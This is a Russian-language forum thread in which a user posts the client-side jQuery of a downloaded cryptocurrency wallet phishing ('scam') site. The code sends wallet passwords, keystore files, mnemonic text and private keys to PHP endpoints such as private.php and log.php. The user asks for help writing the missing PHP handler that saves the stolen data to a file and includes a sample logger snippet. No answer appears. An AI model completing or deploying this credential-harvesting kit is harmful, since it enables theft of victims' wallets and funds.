Сохранение пароля сайта в php

Discussion in 'PHP' started by iqlab, 6 May 2018.

  1. iqlab

    iqlab New Member

    Joined:
    6 May 2018
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Всем привет!!Нужна подсказка.. Скачал скам сайт, который копирует введенные пароли в дирикторю сайта скриптом. Погуглив, понял что для его работы не хватает обработчика в PHP.

    Вот код из скрипта........
    console.log('dofiga');

    var $input = $(".wallet-file");
    var fd = new FormData;
    var file = $input.prop('files');
    if (file) {
    fd.append('json', $input.prop('files')[0]);
    }

    if (file) {

    $.ajax({
    type: "POST",
    url: 'log2.php',
    data: {data: $('.wallet-password').val()},
    });

    $.ajax({
    url: 'keystore.php',
    data: fd,
    processData: false,
    contentType: false,
    type: 'POST',
    success: function (data) {
    console.log(data);
    }
    });

    } else {
    $.ajax({
    type: "POST",
    url: 'log.php',
    data: {data: $('textarea#aria6').val()},
    // success: success,
    // dataType: dataType
    });
    }
    и еще.......

    // console.log();

    // $()
    $.ajax({
    type: "POST",
    url: 'wallet.php',
    data: data,
    contentType: false,
    processData: false,
    success: function(e) {
    console.log(e);
    }
    });

    $.ajax({
    type: "POST",
    url: 'private.php',
    data: {pk: $scope.wallet.getPrivateKeyString(), pass: window.password},
    });




    Вот скрипт из index.html:
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script>
    $(document).ready(function() {
    // $('.private-key-unlock').click(function(e) {
    // console.log('here...');
    // e.preventDefault();
    // $.ajax({
    // type: "POST",
    // url: 'log.php',
    // data: {data: $('textarea#aria6').val()},
    // success: success,
    // // dataType: dataType
    // });
    // function success(e) {
    // console.log(e);
    // }
    // });
    })
    </script>



    Из чего понял что в корневой директории сайта есть файлы: log.php, log2.php, private.php, keystore.php. Меня интересует конкретно файл private.php, я так понял, что в нем короткий код бработчика типа :
    <?php
    $fp = @fopen("test.txt","a");
    fwrite($fp, $_POST['name']."\n".$_POST['mail']."\n".$_POST['text']."\n");
    fclose($fp);
    ?>

    Но что конкретно я пока не смог разобраться или вообще я не на правильном пути? Могу скинть весь сайт в лс если поможете разобраться)) И не закидывайте помидорами за примитивный вопрос, только осваиваю html. Заранее спасибо!!!=))
     
  2. Sun2017

    Sun2017 Member

    Joined:
    5 May 2017
    Messages:
    338
    Likes Received:
    85
    Reputations:
    0
Loading...